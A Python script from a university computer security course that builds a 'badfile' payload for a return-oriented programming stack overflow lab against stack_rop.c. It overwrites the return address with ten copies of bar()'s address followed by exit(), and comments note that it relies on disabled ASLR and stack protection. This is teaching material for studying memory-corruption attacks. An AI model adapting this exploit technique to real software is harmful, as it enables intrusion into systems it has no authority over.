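#!/usr/bin/python3
'''
Prepare a badfile for exploiting return-oriented programming.
Use in conjunction with stack_rop.c. First run this program to create
badfile, then run stack_rop to demonstrate multiple calls to bar.

Author: Tim Pierson, Dartmouth CS55, Winter 2021
From Du: Computer and Internet Security at
https://raw.githubusercontent.com/kevin-w-du/BookCode/master/Return_to_Libc/chain_noarg.py

run: python3 exploit_rop.py
will output badfile to be exploited by stack_rop.c
'''
# The page had this whole script collapsed onto the shebang line, so the
# interpreter saw a single comment and wrote nothing; the line structure is
# restored here.
import sys


def tobytes(value):
    """Return *value* encoded as 4 bytes in little-endian order.

    Raises OverflowError (from int.to_bytes) if *value* is negative or does
    not fit in 32 bits.
    """
    return value.to_bytes(4, byteorder='little')


# NOTE(review): both addresses are hard-coded for one particular build and
# memory layout of the stack_rop.c lab target. They are presumably only stable
# when the target is non-PIE and ASLR is disabled; confirm against the lab
# setup before expecting the demonstration to reproduce.
bar_addr = 0x080485fb   # Address of bar()
exit_addr = 0xb7d939d0  # Address of exit()

# 112 filler bytes. The length is tied to the frame layout of the function in
# stack_rop.c that reads badfile (not shown here). A target built with a stack
# protector would have its canary overwritten by this filler and abort before
# returning.
content = bytearray(b"\xaa" * 112)

# This value is not important here.
# NOTE(review): presumably lands on the saved frame pointer slot; confirm
# against stack_rop.c.
content += tobytes(0xFFFFFFFF)

# Ten consecutive copies of bar()'s address, giving the repeated calls to bar
# described in the module docstring.
content += tobytes(bar_addr) * 10

# Invoke exit() to exit gracefully at the end
content += tobytes(exit_addr)

# Write the content to a file
with open("badfile", "wb") as f:
    f.write(content)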